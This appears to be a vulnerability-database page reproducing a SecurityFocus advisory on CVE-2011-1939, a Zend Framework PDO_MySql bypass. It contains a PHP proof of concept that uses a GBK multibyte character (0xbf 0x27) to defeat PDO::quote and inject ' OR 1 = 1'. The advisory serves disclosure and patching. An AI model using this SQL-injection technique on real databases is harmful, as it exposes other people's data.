Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2011-1939 | 19 May 201100:00 | – | circl | |
| CVE-2011-1939 | 26 Nov 201921:17 | – | cve | |
| CVE-2011-1939 | 26 Nov 201921:17 | – | cvelist | |
| EUVD-2011-1937 | 7 Oct 202500:30 | – | euvd | |
| GLSA-201408-01 : Zend Framework: SQL injection | 5 Aug 201400:00 | – | nessus | |
| Zend Framework: SQL injection | 4 Aug 201400:00 | – | gentoo | |
| CVE-2011-1939 | 26 Nov 201922:15 | – | nvd | |
| Gentoo Security Advisory GLSA 201408-01 | 29 Sep 201500:00 | – | openvas | |
| Sql injection | 26 Nov 201922:15 | – | prion | |
| CVE-2011-1939 | 26 Nov 201922:15 | – | ubuntucve |
source: https://www.securityfocus.com/bid/47919/info
Zend Framework is prone to a security-bypass vulnerability.
An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.
Zend Framework versions prior to 1.10.9 and 1.11.6 are vulnerable.
$dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
$pdo = new PDO($dsn, $user, $pass);
$pdo->exec('SET NAMES GBK');
$string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
$sql = "SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
$stmt = $pdo->query($sql);
var_dump($stmt->rowCount());Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2015 00:00Current
8.4High risk
Vulners AI Score8.4
CVSS 27.5
CVSS 3.19.8
EPSS0.03858